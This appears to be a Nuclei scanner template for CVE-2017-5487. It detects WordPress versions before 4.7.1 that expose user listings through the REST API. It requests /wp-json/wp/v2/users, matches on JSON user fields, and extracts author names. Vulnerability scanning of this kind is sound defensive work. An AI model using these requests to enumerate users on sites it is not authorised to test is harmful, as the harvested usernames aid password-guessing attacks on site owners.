id: CVE-2017-5487
info:
  name: WordPress Core < 4.7.1 - Username Enumeration
  author: Manas_Harsh,daffainfo,geeknik
  severity: medium
  description: "WordPress Core < 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request."
  reference:
    - https://www.exploit-db.com/exploits/41497
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.30
    cve-id: CVE-2017-5487
    cwe-id: CWE-200
  tags: cve,cve2017,wordpress
requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/users/"
      - "{{BaseURL}}/?rest_route=/wp/v2/users/"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: header
        words:
          - "application/json"
      - type: word
        words:
          - '"id":'
          - '"name":'
          - '"avatar_urls":'
        condition: and
    extractors:
      - type: json
        json:
          - '.[].name'

# Enahnced by mp 03/31/2022